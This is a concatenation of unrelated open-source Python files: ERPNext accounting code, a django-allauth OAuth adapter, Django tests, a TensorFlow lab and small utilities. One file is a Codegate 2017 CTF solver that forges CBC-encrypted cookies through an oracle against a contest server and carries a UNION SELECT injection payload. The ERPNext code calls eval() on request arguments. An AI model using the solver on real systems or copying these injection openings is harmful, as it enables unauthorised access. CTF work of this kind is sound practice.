"Stopped": frappe.throw(_("{0} {1} is stopped").format(doctype, voucher_no)) if flt(voucher_properties[4]) < flt(voucher_properties[3]) + flt(sum(payment_list)): frappe.throw(_("Advance paid against {0} {1} cannot be greater \ than Grand Total {2}").format(doctype, voucher_no, voucher_properties[3])) def set_against_account(self): accounts_debited, accounts_credited = [], [] for d in self.get("accounts"): if flt(d.debit > 0): accounts_debited.append(d.party or d.account) if flt(d.credit) > 0: accounts_credited.append(d.party or d.account) for d in self.get("accounts"): if flt(d.debit > 0): d.against_account = ", ".join(list(set(accounts_credited))) if flt(d.credit > 0): d.against_account = ", ".join(list(set(accounts_debited))) def validate_debit_and_credit(self): self.total_debit, self.total_credit, self.difference = 0, 0, 0 for d in self.get("accounts"): if d.debit and d.credit: frappe.throw(_("You cannot credit and debit same account at the same time")) self.total_debit = flt(self.total_debit) + flt(d.debit, self.precision("debit", "accounts")) self.total_credit = flt(self.total_credit) + flt(d.credit, 
self.precision("credit", "accounts")) self.difference = flt(self.total_debit, self.precision("total_debit")) - \ flt(self.total_credit, self.precision("total_credit")) if self.difference: frappe.throw(_("Total Debit must be equal to Total Credit. The difference is {0}") .format(self.difference)) def create_remarks(self): r = [] if self.cheque_no: if self.cheque_date: r.append(_('Reference #{0} dated {1}').format(self.cheque_no, formatdate(self.cheque_date))) else: msgprint(_("Please enter Reference date"), raise_exception=frappe.MandatoryError) company_currency = get_company_currency(self.company) for d in self.get('accounts'): if d.against_invoice and d.credit: r.append(_("{0} against Sales Invoice {1}").format(fmt_money(flt(d.credit), currency = company_currency), \ d.against_invoice)) if d.against_sales_order and d.credit: r.append(_("{0} against Sales Order {1}").format(fmt_money(flt(d.credit), currency = company_currency), \ d.against_sales_order)) if d.against_voucher and d.debit: bill_no = frappe.db.sql("""select bill_no, bill_date from `tabPurchase Invoice` where name=%s""", d.against_voucher) if bill_no and bill_no[0][0] and bill_no[0][0].lower().strip() \ not in ['na', 'not applicable', 'none']: r.append(_('{0} against Bill {1} dated {2}').format(fmt_money(flt(d.debit), currency=company_currency), bill_no[0][0], bill_no[0][1] and formatdate(bill_no[0][1].strftime('%Y-%m-%d')))) if d.against_purchase_order and d.debit: r.append(_("{0} against Purchase Order {1}").format(fmt_money(flt(d.credit), currency = company_currency), \ d.against_purchase_order)) if self.user_remark: r.append(_("Note: {0}").format(self.user_remark)) if r: self.remark = ("\n").join(r) #User Remarks is not mandatory def set_print_format_fields(self): for d in self.get('accounts'): if d.party_type and d.party: if not self.pay_to_recd_from: self.pay_to_recd_from = frappe.db.get_value(d.party_type, d.party, "customer_name" if d.party_type=="Customer" else "supplier_name") self.set_total_amount(d.debit or d.credit) elif frappe.db.get_value("Account", d.account, "account_type") in ["Bank", "Cash"]: self.set_total_amount(d.debit or d.credit) def set_total_amount(self, amt): company_currency = get_company_currency(self.company) self.total_amount = amt from frappe.utils import money_in_words self.total_amount_in_words = money_in_words(amt, company_currency) def make_gl_entries(self, cancel=0, adv_adj=0): from erpnext.accounts.general_ledger import make_gl_entries gl_map = [] for d in self.get("accounts"): if d.debit or d.credit: gl_map.append( self.get_gl_dict({ "account": d.account, "party_type": d.party_type, "party": d.party, "against": d.against_account, "debit": flt(d.debit, self.precision("debit", "accounts")), "credit": flt(d.credit, self.precision("credit", "accounts")), "against_voucher_type": (("Purchase Invoice" if d.against_voucher else None) or ("Sales Invoice" if d.against_invoice else None) or ("Journal Entry" if d.against_jv else None) or ("Sales Order" if d.against_sales_order else None) or ("Purchase Order" if d.against_purchase_order else None)), "against_voucher": d.against_voucher or d.against_invoice or d.against_jv or d.against_sales_order or d.against_purchase_order, "remarks": self.remark, "cost_center": d.cost_center }) ) if gl_map: make_gl_entries(gl_map, cancel=cancel, adv_adj=adv_adj) def get_balance(self): if not self.get('accounts'): msgprint(_("'Entries' cannot be empty"), raise_exception=True) else: flag, self.total_debit, self.total_credit = 0, 0, 0 diff = flt(self.difference, 
self.precision("difference")) # If any row without amount, set the diff on that row for d in self.get('accounts'): if not d.credit and not d.debit and diff != 0: if diff>0: d.credit = diff elif diff<0: d.debit = diff flag = 1 # Set the diff in a new row if flag == 0 and diff != 0: jd = self.append('accounts', {}) if diff>0: jd.credit = abs(diff) elif diff<0: jd.debit = abs(diff) self.validate_debit_and_credit() def get_outstanding_invoices(self): self.set('accounts', []) total = 0 for d in self.get_values(): total += flt(d.outstanding_amount, self.precision("credit", "accounts")) jd1 = self.append('accounts', {}) jd1.account = d.account jd1.party = d.party if self.write_off_based_on == 'Accounts Receivable': jd1.party_type = "Customer" jd1.credit = flt(d.outstanding_amount, self.precision("credit", "accounts")) jd1.against_invoice = cstr(d.name) elif self.write_off_based_on == 'Accounts Payable': jd1.party_type = "Supplier" jd1.debit = flt(d.outstanding_amount, self.precision("debit", "accounts")) jd1.against_voucher = cstr(d.name) jd2 = self.append('accounts', {}) if self.write_off_based_on == 'Accounts Receivable': jd2.debit = total elif self.write_off_based_on == 'Accounts Payable': jd2.credit = total self.validate_debit_and_credit() def get_values(self): cond = " and outstanding_amount <= {0}".format(self.write_off_amount) \ if flt(self.write_off_amount) > 0 else "" if self.write_off_based_on == 'Accounts Receivable': return frappe.db.sql("""select name, debit_to as account, customer as party, outstanding_amount from `tabSales Invoice` where docstatus = 1 and company = %s and outstanding_amount > 0 %s""" % ('%s', cond), self.company, as_dict=True) elif self.write_off_based_on == 'Accounts Payable': return frappe.db.sql("""select name, credit_to as account, supplier as party, outstanding_amount from `tabPurchase Invoice` where docstatus = 1 and company = %s and outstanding_amount > 0 %s""" % ('%s', cond), self.company, as_dict=True) def update_expense_claim(self): for d in self.accounts: if d.against_expense_claim: amt = frappe.db.sql("""select sum(debit) as amt from `tabJournal Entry Account` where against_expense_claim = %s and docstatus = 1""", d.against_expense_claim ,as_dict=1)[0].amt frappe.db.set_value("Expense Claim", d.against_expense_claim , "total_amount_reimbursed", amt) def validate_expense_claim(self): for d in self.accounts: if d.against_expense_claim: sanctioned_amount, reimbursed_amount = frappe.db.get_value("Expense Claim", d.against_expense_claim, ("total_sanctioned_amount", "total_amount_reimbursed")) pending_amount = flt(sanctioned_amount) - flt(reimbursed_amount) if d.debit > pending_amount: frappe.throw(_("Row No {0}: Amount cannot be greater than Pending Amount against Expense Claim {1}. 
Pending Amount is {2}".format(d.idx, d.against_expense_claim, pending_amount))) def validate_credit_debit_note(self): if self.stock_entry: if frappe.db.get_value("Stock Entry", self.stock_entry, "docstatus") != 1: frappe.throw(_("Stock Entry {0} is not submitted").format(self.stock_entry)) if frappe.db.exists({"doctype": "Journal Entry", "stock_entry": self.stock_entry, "docstatus":1}): frappe.msgprint(_("Warning: Another {0} # {1} exists against stock entry {2}".format(self.voucher_type, self.name, self.stock_entry))) def validate_empty_accounts_table(self): if not self.get('accounts'): frappe.throw("Accounts table cannot be blank.") @frappe.whitelist() def get_default_bank_cash_account(company, voucher_type, mode_of_payment=None): from erpnext.accounts.doctype.sales_invoice.sales_invoice import get_bank_cash_account if mode_of_payment: account = get_bank_cash_account(mode_of_payment, company) if account.get("account"): account.update({"balance": get_balance_on(account.get("account"))}) return account if voucher_type=="Bank Entry": account = frappe.db.get_value("Company", company, "default_bank_account") if not account: account = frappe.db.get_value("Account", {"company": company, "account_type": "Bank", "is_group": 0}) elif voucher_type=="Cash Entry": account = frappe.db.get_value("Company", company, "default_cash_account") if not account: account = frappe.db.get_value("Account", {"company": company, "account_type": "Cash", "is_group": 0}) if account: return { "account": account, "balance": get_balance_on(account) } @frappe.whitelist() def get_payment_entry_from_sales_invoice(sales_invoice): from erpnext.accounts.utils import get_balance_on si = frappe.get_doc("Sales Invoice", sales_invoice) jv = get_payment_entry(si) jv.remark = 'Payment received against Sales Invoice {0}. {1}'.format(si.name, si.remarks) # credit customer jv.get("accounts")[0].account = si.debit_to jv.get("accounts")[0].party_type = "Customer" jv.get("accounts")[0].party = si.customer jv.get("accounts")[0].balance = get_balance_on(si.debit_to) jv.get("accounts")[0].party_balance = get_balance_on(party=si.customer, party_type="Customer") jv.get("accounts")[0].credit = si.outstanding_amount jv.get("accounts")[0].against_invoice = si.name # debit bank jv.get("accounts")[1].debit = si.outstanding_amount return jv.as_dict() @frappe.whitelist() def get_payment_entry_from_purchase_invoice(purchase_invoice): pi = frappe.get_doc("Purchase Invoice", purchase_invoice) jv = get_payment_entry(pi) jv.remark = 'Payment against Purchase Invoice {0}. 
{1}'.format(pi.name, pi.remarks) # credit supplier jv.get("accounts")[0].account = pi.credit_to jv.get("accounts")[0].party_type = "Supplier" jv.get("accounts")[0].party = pi.supplier jv.get("accounts")[0].balance = get_balance_on(pi.credit_to) jv.get("accounts")[0].party_balance = get_balance_on(party=pi.supplier, party_type="Supplier") jv.get("accounts")[0].debit = pi.outstanding_amount jv.get("accounts")[0].against_voucher = pi.name # credit bank jv.get("accounts")[1].credit = pi.outstanding_amount return jv.as_dict() def get_payment_entry(doc): bank_account = get_default_bank_cash_account(doc.company, "Bank Entry") jv = frappe.new_doc('Journal Entry') jv.voucher_type = 'Bank Entry' jv.company = doc.company jv.fiscal_year = doc.fiscal_year jv.append("accounts") d2 = jv.append("accounts") if bank_account: d2.account = bank_account["account"] d2.balance = bank_account["balance"] return jv @frappe.whitelist() def get_opening_accounts(company): """get all balance sheet accounts for opening entry""" accounts = frappe.db.sql_list("""select name from tabAccount where is_group=0 and report_type='Balance Sheet' and company=%s""", company) return [{"account": a, "balance": get_balance_on(a)} for a in accounts] def get_against_jv(doctype, txt, searchfield, start, page_len, filters): return frappe.db.sql("""select jv.name, jv.posting_date, jv.user_remark from `tabJournal Entry` jv, `tabJournal Entry Account` jv_detail where jv_detail.parent = jv.name and jv_detail.account = %s and ifnull(jv_detail.party, '') = %s and (ifnull(jv_detail.against_invoice, '') = '' and ifnull(jv_detail.against_voucher, '') = '' and ifnull(jv_detail.against_jv, '') = '' ) and jv.docstatus = 1 and jv.{0} like %s order by jv.name desc limit %s, %s""".format(searchfield), (filters.get("account"), cstr(filters.get("party")), "%{0}%".format(txt), start, page_len)) @frappe.whitelist() def get_outstanding(args): args = eval(args) if args.get("doctype") == "Journal Entry": condition = " and party=%(party)s" if args.get("party") else "" against_jv_amount = frappe.db.sql(""" select sum(ifnull(debit, 0)) - sum(ifnull(credit, 0)) from `tabJournal Entry Account` where parent=%(docname)s and account=%(account)s {0} and ifnull(against_invoice, '')='' and ifnull(against_voucher, '')='' and ifnull(against_jv, '')=''""".format(condition), args) against_jv_amount = flt(against_jv_amount[0][0]) if against_jv_amount else 0 if against_jv_amount > 0: return {"credit": against_jv_amount} else: return {"debit": -1* against_jv_amount} elif args.get("doctype") == "Sales Invoice": return { "credit": flt(frappe.db.get_value("Sales Invoice", args["docname"], "outstanding_amount")) } elif args.get("doctype") == "Purchase Invoice": return { "debit": flt(frappe.db.get_value("Purchase Invoice", args["docname"], "outstanding_amount")) } @frappe.whitelist() def get_party_account_and_balance(company, party_type, party): from erpnext.accounts.party import get_party_account account = get_party_account(company, party, party_type) account_balance = get_balance_on(account=account) party_balance = get_balance_on(party_type=party_type, party=party) return { "account": account, "balance": account_balance, "party_balance": party_balance }
avsd/django-allauth
refs/heads/master
allauth/socialaccount/providers/foursquare/views.py
71
import requests

from allauth.socialaccount.providers.oauth2.views import (OAuth2Adapter,
                                                           OAuth2LoginView,
                                                           OAuth2CallbackView)

from .provider import FoursquareProvider


class FoursquareOAuth2Adapter(OAuth2Adapter):
    provider_id = FoursquareProvider.id
    access_token_url = 'https://foursquare.com/oauth2/access_token'
    # Issue ?? -- this one authenticates over and over again...
    # authorize_url = 'https://foursquare.com/oauth2/authorize'
    authorize_url = 'https://foursquare.com/oauth2/authenticate'
    profile_url = 'https://api.foursquare.com/v2/users/self'

    def complete_login(self, request, app, token, **kwargs):
        # Foursquare needs a version number for their API requests as
        # documented here: https://developer.foursquare.com/overview/versioning
        resp = requests.get(self.profile_url,
                            params={'oauth_token': token.token, 'v': '20140116'})
        extra_data = resp.json()['response']['user']
        return self.get_provider().sociallogin_from_response(request,
                                                             extra_data)


oauth2_login = OAuth2LoginView.adapter_view(FoursquareOAuth2Adapter)
oauth2_callback = OAuth2CallbackView.adapter_view(FoursquareOAuth2Adapter)
itzzshirlayyy/Online_Ordering
refs/heads/master
venv/lib/python2.7/site-packages/pip/_vendor/cachecontrol/compat.py
317
try:
    from urllib.parse import urljoin
except ImportError:
    from urlparse import urljoin


try:
    import cPickle as pickle
except ImportError:
    import pickle


from pip._vendor.requests.packages.urllib3.response import HTTPResponse
from pip._vendor.requests.packages.urllib3.util import is_fp_closed
hohoins/ml
refs/heads/master
hunkim/ml_lab_05.py
1
# References
# "Machine Learning / Deep Learning for Everyone" lecture series
# Prof. 김성훈 (Sung Kim), HKUST
# http://hunkim.github.io/ml

import tensorflow as tf
import numpy as np

# Data
xy = np.loadtxt('ml_lab_05.txt', unpack=True, dtype='float32')
x_data = xy[0:-1]
y_data = xy[-1]

X = tf.placeholder(tf.float32)
Y = tf.placeholder(tf.float32)

# Variable
W = tf.Variable(tf.random_uniform([1, 3], -1.0, 1.0))

# Hypothesis (sigmoid)
h = tf.matmul(W, X)
hypothesis = tf.div(1.0, 1.0 + tf.exp(-h))

# Cost (cross-entropy)
cost = -tf.reduce_mean(Y*tf.log(hypothesis) + (1-Y)*tf.log(1-hypothesis))

# Gradient descent algorithm
a = tf.Variable(0.1)
optimizer = tf.train.GradientDescentOptimizer(a)
train = optimizer.minimize(cost)

# Init
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)

# Train
for step in range(2001):
    sess.run(train, feed_dict={X: x_data, Y: y_data})
    if step % 20 == 0:
        print(step, sess.run(cost, feed_dict={X: x_data, Y: y_data}), sess.run(W))

# Predict
print(sess.run(hypothesis, feed_dict={X: [[1], [2], [2]]}) > 0.5)
print(sess.run(hypothesis, feed_dict={X: [[1], [5], [5]]}) > 0.5)
print(sess.run(hypothesis, feed_dict={X: [[1, 1], [4, 3], [3, 5]]}) > 0.5)
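The hypothesis and cost above can be checked by hand; the NumPy sketch below is not part of the original lab and uses made-up weights, but it mirrors the same sigmoid and cross-entropy formulas on toy values.

# NumPy mirror of the TensorFlow graph above, with toy weights and one sample.
import numpy as np

W = np.array([[0.5, -0.2, 0.1]])       # 1 x 3 weights (toy values)
X = np.array([[1.0], [2.0], [2.0]])    # 3 x 1 input: bias term plus two features
Y = np.array([[1.0]])                  # toy label

h = W.dot(X)                                    # same as tf.matmul(W, X)
hypothesis = 1.0 / (1.0 + np.exp(-h))           # sigmoid
cost = -np.mean(Y * np.log(hypothesis) + (1 - Y) * np.log(1 - hypothesis))
print(hypothesis, cost)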
rbaindourov/v8-inspector
refs/heads/master
Source/chrome/tools/telemetry/telemetry/story/__init__.py
5
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

# TODO (aiolos): replace with user_story/__init__.py in subsequent cl.
apigee/henchman
refs/heads/master
modules/curl/curl/requests/requests/packages/chardet/compat.py
2942
######################## BEGIN LICENSE BLOCK ########################
# Contributor(s):
#   Ian Cordasco - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301  USA
######################### END LICENSE BLOCK #########################

import sys


if sys.version_info < (3, 0):
    base_str = (str, unicode)
else:
    base_str = (bytes, str)


def wrap_ord(a):
    if sys.version_info < (3, 0) and isinstance(a, base_str):
        return ord(a)
    else:
        return a
junhuac/MQUIC
refs/heads/master
depot_tools/third_party/boto/cacerts/__init__.py
260
# Copyright 2010 Google Inc. # All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. #
vsoch/docfish
refs/heads/master
docfish/apps/main/urls/collaborate.py
1
''' Copyright (c) 2017 Vanessa Sochat Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ''' from django.conf.urls import url import docfish.apps.main.views as views urlpatterns = [ # Change / add contributors url(r'^contributors/(?P<cid>\d+)/(?P<uid>.+?)/remove$',views.remove_contributor,name='remove_contributor'), url(r'^contributors/(?P<cid>\d+)/add$',views.add_contributor,name='add_contributor'), url(r'^contributors/(?P<cid>\d+)/edit$',views.edit_contributors,name='edit_contributors'), url(r'^start$', views.collection_chooser, name="collection_chooser"), url(r'^teams/(?P<tid>.+?)/collection/(?P<cid>.+?)/start$', views.team_portal, name="team_portal"), url(r'^teams/(?P<tid>.+?)/video$', views.team_video, name="team_video"), # Video #url(r'^teams/video/describe$',views.video_describe_web,name='video_describe_web'), ]
SujaySKumar/django
refs/heads/master
tests/max_lengths/models.py
438
from django.db import models


class PersonWithDefaultMaxLengths(models.Model):
    email = models.EmailField()
    vcard = models.FileField(upload_to='/tmp')
    homepage = models.URLField()
    avatar = models.FilePathField()


class PersonWithCustomMaxLengths(models.Model):
    email = models.EmailField(max_length=250)
    vcard = models.FileField(upload_to='/tmp', max_length=250)
    homepage = models.URLField(max_length=250)
    avatar = models.FilePathField(max_length=250)
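A hedged check of the contrast these two models encode, assuming a configured Django test environment; the import path follows the tests package layout above, and the default EmailField length noted in the comment may differ on older Django versions.

# Inspect the generated fields' max_length values.
from max_lengths.models import PersonWithDefaultMaxLengths, PersonWithCustomMaxLengths

default_len = PersonWithDefaultMaxLengths._meta.get_field('email').max_length
custom_len = PersonWithCustomMaxLengths._meta.get_field('email').max_length
print(default_len)  # framework default (254 on recent Django)
print(custom_len)   # 250, as set explicitly above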
Qwaz/solved-hacking-problem
refs/heads/master
Codegate/2017 Quals/2d-life/solver.py
1
from base64 import b64decode, b64encode import urllib import os import sys import requests # Filters: ' _ in (( pro or and group # Columns: no, rank URL = 'http://110.10.212.147:24135/?p=secret_login' cookie = 'QUWBPscLRhg%3D%7CKTwXZ6BPHP%2FSLTJWZnvk3OScLSc5%2F29PdAaCwsI5DmssvUiJtPmnjPNJGRmvLRccEFf3UKu4bklun1%2BCG0MM7w%3D%3D' cookie = urllib.unquote(cookie) iv, data = map(b64decode, cookie.split('|')) ''' MESSAGE \ FROM SPY\ <!--TABL\ E:agents\ NUMBER \ OF COLUM\ NS:5-->;\ SPY;66\x02\x02 ''' data = data def generate_cookie(iv, data): return urllib.quote('|'.join(map(b64encode, (iv, data)))) def string_xor(s1, s2): assert(len(s1) == len(s2)) ret = '' for i in range(len(s1)): ret += chr(ord(s1[i]) ^ ord(s2[i])) return ret def oracle_pad(msg): remainder = 8 - len(msg) % 8 msg += chr(remainder)*remainder return msg def send_payload(payload): fake = generate_cookie(payload[:8], payload[8:]) r = requests.get(URL, cookies={'identify': fake}) result = r.content.split('<title>liiumlntl Iogln</title>\n')[1] if 'Is that all? HACKER?' in result: print '!! Hacking Detected !!' return 'HACK' if 'Hello, ' in result: after_hello = result[20:] if not after_hello.startswith('<br>'): return after_hello return None # NAME & RANK should not contain ; NAME = sys.argv[1] RANK = sys.argv[2] # 0 union select 1,2,a.4,4,5 from (select 1,2,3,4,5 union select * from agents where rank=0 limit 1,1)a target = oracle_pad(';' + NAME + ';' + RANK) last_block = 'SPY;66\x02\x02' tail = string_xor(data[-16:-8], string_xor(last_block, target[-8:]))+data[-8:] num_block = len(target) // 8 + 1 for block_idx in range(num_block-3, -1, -1): dummy = os.urandom(7) while send_payload(chr(0) + dummy + tail): dummy = os.urandom(7) # inject ; success = False for byte in range(256): payload = chr(byte) + dummy + tail print "Trying block {}, byte {}".format(block_idx, byte) after_hello = send_payload(payload) if after_hello and after_hello != 'HACK' and not after_hello.startswith(RANK): tail = string_xor(target[8*(block_idx):8*(block_idx+1)], string_xor(chr(byte)+dummy, ';'+after_hello[:7])) + tail success = True break if not success: print '!! invalid payload !!' exit(0) fake = generate_cookie(tail[:8], tail[8:]) r = requests.get(URL, cookies={'identify': fake}) result = r.content.split('<title>liiumlntl Iogln</title>\n')[1] print result print fake
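The attack above leans on one CBC property: XOR-ing a change into ciphertext block C[i-1] XORs the same change into decrypted plaintext block P[i]. The standalone sketch below uses toy strings only and no server; ';Bond;77' is an invented target value.

# Toy illustration of the block forging used by the solver (8-byte blocks).
def string_xor(s1, s2):
    assert len(s1) == len(s2)
    return ''.join(chr(ord(a) ^ ord(b)) for a, b in zip(s1, s2))

prev_block = 'ABCDEFGH'          # stand-in for ciphertext block C[i-1]
known_pt = 'SPY;66\x02\x02'      # plaintext block the server currently decrypts
target_pt = ';Bond;77'           # invented plaintext we want instead

forged_prev = string_xor(prev_block, string_xor(known_pt, target_pt))
# Since P[i] = D(C[i]) XOR C[i-1], replacing C[i-1] with forged_prev yields
# D(C[i]) XOR forged_prev = known_pt XOR known_pt XOR target_pt = target_pt.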
mattrobenolt/django
refs/heads/master
tests/template_tests/syntax_tests/test_list_index.py
521
from django.test import SimpleTestCase from ..utils import setup class ListIndexTests(SimpleTestCase): @setup({'list-index01': '{{ var.1 }}'}) def test_list_index01(self): """ List-index syntax allows a template to access a certain item of a subscriptable object. """ output = self.engine.render_to_string('list-index01', {'var': ['first item', 'second item']}) self.assertEqual(output, 'second item') @setup({'list-index02': '{{ var.5 }}'}) def test_list_index02(self): """ Fail silently when the list index is out of range. """ output = self.engine.render_to_string('list-index02', {'var': ['first item', 'second item']}) if self.engine.string_if_invalid: self.assertEqual(output, 'INVALID') else: self.assertEqual(output, '') @setup({'list-index03': '{{ var.1 }}'}) def test_list_index03(self): """ Fail silently when the list index is out of range. """ output = self.engine.render_to_string('list-index03', {'var': None}) if self.engine.string_if_invalid: self.assertEqual(output, 'INVALID') else: self.assertEqual(output, '') @setup({'list-index04': '{{ var.1 }}'}) def test_list_index04(self): """ Fail silently when variable is a dict without the specified key. """ output = self.engine.render_to_string('list-index04', {'var': {}}) if self.engine.string_if_invalid: self.assertEqual(output, 'INVALID') else: self.assertEqual(output, '') @setup({'list-index05': '{{ var.1 }}'}) def test_list_index05(self): """ Dictionary lookup wins out when dict's key is a string. """ output = self.engine.render_to_string('list-index05', {'var': {'1': "hello"}}) self.assertEqual(output, 'hello') @setup({'list-index06': '{{ var.1 }}'}) def test_list_index06(self): """ But list-index lookup wins out when dict's key is an int, which behind the scenes is really a dictionary lookup (for a dict) after converting the key to an int. """ output = self.engine.render_to_string('list-index06', {"var": {1: "hello"}}) self.assertEqual(output, 'hello') @setup({'list-index07': '{{ var.1 }}'}) def test_list_index07(self): """ Dictionary lookup wins out when there is a string and int version of the key. """ output = self.engine.render_to_string('list-index07', {"var": {'1': "hello", 1: "world"}}) self.assertEqual(output, 'hello')
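A hedged standalone check of the lookup order those docstrings describe, using the plain django.template API and assuming Django settings are already configured:

# {{ var.1 }} resolves via dictionary lookup first, then list indexing.
from django.template import Context, Template

t = Template('{{ var.1 }}')
print(t.render(Context({'var': ['first item', 'second item']})))  # -> second item
print(t.render(Context({'var': {'1': 'hello', 1: 'world'}})))     # -> hello (string key wins)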
zhuwenping/python-for-android
refs/heads/master
python3-alpha/python3-src/Tools/scripts/dutree.py
112
#! /usr/bin/env python3 # Format du output in a tree shape import os, sys, errno def main(): p = os.popen('du ' + ' '.join(sys.argv[1:]), 'r') total, d = None, {} for line in p.readlines(): i = 0 while line[i] in '0123456789': i = i+1 size = eval(line[:i]) while line[i] in ' \t': i = i+1 filename = line[i:-1] comps = filename.split('/') if comps[0] == '': comps[0] = '/' if comps[len(comps)-1] == '': del comps[len(comps)-1] total, d = store(size, comps, total, d) try: display(total, d) except IOError as e: if e.errno != errno.EPIPE: raise def store(size, comps, total, d): if comps == []: return size, d if comps[0] not in d: d[comps[0]] = None, {} t1, d1 = d[comps[0]] d[comps[0]] = store(size, comps[1:], t1, d1) return total, d def display(total, d): show(total, d, '') def show(total, d, prefix): if not d: return list = [] sum = 0 for key in d.keys(): tsub, dsub = d[key] list.append((tsub, key)) if tsub is not None: sum = sum + tsub ## if sum < total: ## list.append((total - sum, os.curdir)) list.sort() list.reverse() width = len(repr(list[0][0])) for tsub, key in list: if tsub is None: psub = prefix else: print(prefix + repr(tsub).rjust(width) + ' ' + key) psub = prefix + ' '*(width-1) + '|' + ' '*(len(key)+1) if key in d: show(tsub, d[key][1], psub) if __name__ == '__main__': main()
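A small hedged illustration, with made-up sizes and relative paths, of how store() accumulates the nested dict that display() then prints; it reuses only the functions defined above.

# Build and print a tiny tree without shelling out to du.
total, d = None, {}
for size, path in [(120, 'usr/share/doc'), (80, 'usr/share'), (200, 'usr')]:
    total, d = store(size, path.split('/'), total, d)
display(total, d)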
SickGear/SickGear
refs/heads/master
lib/enzyme/core.py
2
# -*- coding: utf-8 -*- # enzyme - Video metadata parser # Copyright 2011-2012 Antoine Bertin <diaoulael@gmail.com> # Copyright 2003-2006 Thomas Schueppel <stain@acm.org> # Copyright 2003-2006 Dirk Meyer <dischi@freevo.org> # # This file is part of enzyme. # # enzyme is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # enzyme is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with enzyme. If not, see <http://www.gnu.org/licenses/>. import re import logging from . import fourcc from . import language from .strutils import str_to_unicode, unicode_to_str from _23 import decode_str from six import PY2, string_types, text_type UNPRINTABLE_KEYS = ['thumbnail', 'url', 'codec_private'] MEDIACORE = ['title', 'caption', 'comment', 'size', 'type', 'subtype', 'timestamp', 'keywords', 'country', 'language', 'langcode', 'url', 'artist', 'mime', 'datetime', 'tags', 'hash'] AUDIOCORE = ['channels', 'samplerate', 'length', 'encoder', 'codec', 'format', 'samplebits', 'bitrate', 'fourcc', 'trackno', 'id', 'userdate', 'enabled', 'default', 'codec_private'] MUSICCORE = ['trackof', 'album', 'genre', 'discs', 'thumbnail'] VIDEOCORE = ['length', 'encoder', 'bitrate', 'samplerate', 'codec', 'format', 'samplebits', 'width', 'height', 'fps', 'aspect', 'trackno', 'fourcc', 'id', 'enabled', 'default', 'codec_private'] AVCORE = ['length', 'encoder', 'trackno', 'trackof', 'copyright', 'product', 'genre', 'writer', 'producer', 'studio', 'rating', 'actors', 'thumbnail', 'delay', 'image', 'video', 'audio', 'subtitles', 'chapters', 'software', 'summary', 'synopsis', 'season', 'episode', 'series'] # get logging object log = logging.getLogger(__name__) class Media(object): """ Media is the base class to all Media Metadata Containers. It defines the basic structures that handle metadata. Media and its derivates contain a common set of metadata attributes that is listed in keys. Specific derivates contain additional keys to the dublin core set that is defined in Media. """ media = None _keys = MEDIACORE table_mapping = {} def __init__(self, _hash=None): if _hash is not None: # create Media based on dict for key, value in _hash.items(): if isinstance(value, list) and value and isinstance(value[0], dict): value = [Media(x) for x in value] self._set(key, value) return self._keys = self._keys[:] self.tables = {} # Tags, unlike tables, are more well-defined dicts whose values are # either Tag objects, other dicts (for nested tags), or lists of either # (for multiple instances of the tag, e.g. actor). Where possible, # parsers should transform tag names to conform to the Official # Matroska tags defined at http://www.matroska.org/technical/specs/tagging/index.html # All tag names will be lower-cased. 
